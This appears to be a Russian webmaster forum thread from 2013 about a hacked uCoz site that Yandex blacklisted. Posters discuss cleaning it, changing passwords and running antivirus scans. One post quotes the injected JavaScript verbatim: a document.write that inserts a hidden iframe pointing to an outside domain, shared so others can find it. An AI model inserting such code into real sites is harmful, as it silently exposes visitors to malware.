Писал уже об этом тут: /ru/forum/comment/11621543
Интересно другое - если я только что изменил пароли, то не узнает ли об этом злоумышленник? Ведь, насколько я понял, файлы редактировались путем проникновения на сервер (фтп)?
Читал, нет доступа к файлу .htaccess, писал в тех.поддержку, чтобы предоставили возможность его редактировать. Пока молчат.
Проблемный код найден, очищен в тех файлах, которые его использовали. Полностью ли удален вредоносный код с сайта - будет известно после обновления сайта Яндексом.
Всем вебмастерам, которые столкнутся с данной проблемой:
ищите в файлах *.js (возможно, будут другие форматы), дописанный код типа
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wbny.html?j=2827125></iframe>');
О результатах отпишусь после обновления сайта.
ТС, читайте вот эту тему:
/ru/forum/784220
Аналогичная проблема, но она постепенно решается.
Своими глазами я нашел код (о нем я писал выше), который хранился в *.js файлах.
Странно то, что он был размещен не во всех, а в определенных *.js файлах, которые между собой вообще никак не связаны. Это немного усложнило процесс поиска кода.
Использую NOD32, но он не нашел никаких вирусов на сайте. Буду очень благодарен за получение "ругательных текстов" от других антивирусных систем. Это значительно ускорит процесс поиска вредоносного ПО.
1. Отлично! Осталось только посмотреть на реакцию Яндекса. Вчера служба поддержки Яндекса ответила, что просмотрит детально сайт на наличие вредоносного ПО.
2. Пароли поменял.
3. О результатах потом обязательно отпишусь, чтобы остальные вебмастера могли решить похожую проблему.
P.S. Это уже другой вопрос для другой темы. Сайт большой и исправлять все моментально я не могу. Нужно будет установить какой-то сервис для оповещения ошибок. В комментариях также об этом пишут.
Использовал этот сервис еще вчера, но ничего толком не определил. Пишет, что сайт чистый по всем показателям, но он находится в блек-листе Яндекса. Конкретики по вирусному коду я не увидел.
---------- Добавлено 03.04.2013 в 13:21 ----------
Скажите, даже сейчас ругается? Я удалил коды в некоторых *.js файлах, где был дописан такой код:
Неужели еще что-то есть? Если не трудно, можете написать или заскринить, что конкретно пишет каспер?
Я там зарегистрирован более 3-ех лет назад. Я в первом сообщении указывал на то, что пишет яндекс. Конкретного примера вируса нет, только его название.
Я не АС в вирусном ПО, поэтому найти вирус только по его названию без конкретного кода либо файла не могу. :(---------- Добавлено 03.04.2013 в 11:30 ----------
Как бы это банально не звучало, но это - мой один из первых сайтов и создан он в Ucoz, не WP.---------- Добавлено 03.04.2013 в 11:31 ----------
Спасибо, сейчас просмотрю. Хостеру отправил письмо, жду ответа.---------- Добавлено 03.04.2013 в 12:17 ----------Только что зашел на сайт, выбрал сортировку по дате и обнаружил изменение файлов *.js, в которые дописывался следующий код:
Но как это может быть связано с вирусом? И действительно ли проблема именно в данном коде?
Сайт монетизируется только через Яндекс, иногда подключал Adsense. Только что запустил онлайн Dr.Web + McAfee - вирусов не обнаружено.
За последние 4 часа на сайте было около 3-4 человек. Обычно за час получается 90-100 человек.
Нет, объявления самых различных сайтов. Не только определенной компании - так я бы сам понял. Меня поражает именно факт того, что только анимированные объявления не оплачиваются. 🍿
Да, сайт добавлен в разрешенные.
Ничего не показывать.
P.S. даже графические изображения оплачиваются, только анимированные - нет. Никогда еще с таким не сталкивался :)
